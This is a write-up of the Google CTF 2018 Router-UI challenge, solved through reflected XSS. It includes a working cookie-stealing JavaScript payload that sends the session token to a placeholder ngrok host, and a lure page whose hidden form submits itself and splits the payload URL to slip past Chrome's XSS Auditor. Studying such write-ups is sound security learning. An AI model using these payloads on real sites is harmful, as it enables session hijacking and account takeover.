Write-Up: Google CTF 2018 - Router-UI
The challenge was about finding an XSS vulnerability in the supplied web page. XSS stands for Cross-Site Scripting and describes a vulnerability where an attacker injects client-side script into a web page that other users visit, typically with the aim of stealing the victim's session token, but also to manipulate what the user sees, log keystrokes, or perform other actions in the victim's name.
We quickly took a look at the page and were presented with a simple login page of the “OffHub Management Interface”.
I tested the login with some random credentials and got an interesting response: the submitted values were reflected back into the "wrong credentials" page.
The payload obviously has to read the victim's session token and somehow send it to us. This is the XSS payload we came up with to steal the victim's session token from the cookies:
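The following is an added example of such a cookie-stealing payload; it is not the write-up's original code. It assumes the session cookie is named `session` and that the collector endpoint lives at `https://example.ngrok.io/collect` (both are placeholders). The token is URL-encoded before it is put into the query string, and the request is fired through an `<img>` element so no fetch/CORS machinery and no visible navigation are involved.

```javascript
// Added example, not the write-up's payload: stage-two XSS payload that reads
// the session token from document.cookie and sends it to a collector we control.
const COLLECTOR = "https://example.ngrok.io/collect"; // assumption: our ngrok endpoint
const SESSION_COOKIE = "session";                     // assumption: cookie name

// Parse a document.cookie string ("a=1; b=2") into a name -> value object.
function parseCookies(cookieString) {
  const jar = {};
  for (const part of cookieString.split(";")) {
    const idx = part.indexOf("=");
    if (idx === -1) continue;
    const name = part.slice(0, idx).trim();
    if (!name) continue;
    jar[name] = part.slice(idx + 1).trim();
  }
  return jar;
}

// Pick the session cookie; fall back to the whole cookie string if the name is unknown,
// so we still get everything the script can see.
function selectToken(cookieString, name) {
  const jar = parseCookies(cookieString);
  return name in jar ? jar[name] : cookieString;
}

// Build the exfiltration URL. encodeURIComponent keeps '&', '=' or '%' inside the
// cookie value from breaking the query string on the collector side.
function buildExfilUrl(collector, token) {
  return collector + "?c=" + encodeURIComponent(token);
}

// In the victim's browser: setting img.src issues the GET request immediately.
// The URL is returned so the step can be exercised outside a browser.
function exfiltrate(doc) {
  const url = buildExfilUrl(COLLECTOR, selectToken(doc.cookie, SESSION_COOKIE));
  const img = doc.createElement("img");
  img.src = url;
  return url;
}

if (typeof document !== "undefined") exfiltrate(document);
```

Hosted as `payload.js`, this is what the stage-one injection loads; nothing in it is specific to the target beyond the cookie name.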
We then wrote a quick and dirty Express server exposing an endpoint to which our second (real) payload would send the victim's session token, and hosted it temporarily via ngrok.
Then we noticed a problem we had not addressed yet: we still had to get the victim to submit our script to the login page in the first place. The challenge description reads: "If you claim your link includes cat pictures, I'm sure Wintermuted will click it."
So we quickly crafted some HTML with a cute cat picture and a hidden copy of the login form from the original page that submits itself on load, with its action attribute pointing to https://router-ui.web.ctfcompetition.com/login. The input values were set to our first (stage-one) XSS payload, which in turn loads the real payload from our server.
We set the username field's value to "https:" and the password field's value to the ngrok address plus the path to our payload. The slashes can be omitted because they are already present in the HTML of the "wrong credentials" output, between the two reflected values. This is also what gets us past Chrome's XSS Auditor: the auditor looks for request parameters that show up as executable markup in the response, and since neither parameter on its own contains the complete script URL, nothing matches and the payload is loaded. (The XSS Auditor has since been removed from Chrome, so this part of the bypass is only of historical interest.)
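The delivery page and the URL split described above, as an added example that is not the write-up's original HTML. The ngrok host and payload path are placeholders, and the example assumes, as the write-up states, that the server echoes the two fields with the `//` between them; the surrounding markup that turns the reflected values into a script load is not reproduced on the page, so only the split and the self-submitting form are shown.

```javascript
// Added example, not the write-up's delivery page: a cat-picture page with a hidden
// form that POSTs the stage-one payload to the router's login endpoint on load.
const LOGIN_ACTION = "https://router-ui.web.ctfcompetition.com/login";
const PAYLOAD_URL = "https://example.ngrok.io/payload.js"; // assumption: our ngrok URL

// Split "https://host/path" into the scheme ("https:") and the rest ("host/path"),
// dropping the "//" that the target page already supplies between the two fields.
function splitPayloadUrl(url) {
  const m = /^([a-z][a-z0-9+.-]*:)\/\/(.+)$/i.exec(url);
  if (!m) throw new Error("expected an absolute URL");
  return { username: m[1], password: m[2] };
}

// What the target's "wrong credentials" page reassembles (assumption: user//pass order).
function reflectedUrl(fields) {
  return fields.username + "//" + fields.password;
}

// Minimal attribute escaping so our own page stays well-formed.
function escapeHtmlAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

// The page the victim is lured to: visible cat, invisible auto-submitting login form.
function buildDeliveryPage(loginAction, fields) {
  return `<!doctype html>
<html><body>
<img src="cat.jpg" alt="a very cute cat">
<form id="f" method="POST" action="${escapeHtmlAttr(loginAction)}" style="display:none">
  <input name="username" value="${escapeHtmlAttr(fields.username)}">
  <input name="password" value="${escapeHtmlAttr(fields.password)}">
</form>
<script>document.getElementById("f").submit();</script>
</body></html>`;
}

function buildDefaultPage() {
  return buildDeliveryPage(LOGIN_ACTION, splitPayloadUrl(PAYLOAD_URL));
}

if (process.argv.includes("--print")) console.log(buildDefaultPage());
```

Because the form is submitted from our origin, the request is a plain cross-site POST; the script then runs in the router's origin after the login response renders, which is why it can read that origin's cookies.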
It worked! After jumping for joy I crafted an email with the link to our page and sent it to the specified email address. After a few seconds the session cookie showed up in our server logs. Yes, we got 'em!
After importing the session token into our browser we got the admin page. Note that this only worked because the session cookie was set without the HttpOnly flag; with that flag the XSS would still have executed, but document.cookie would not have exposed the token.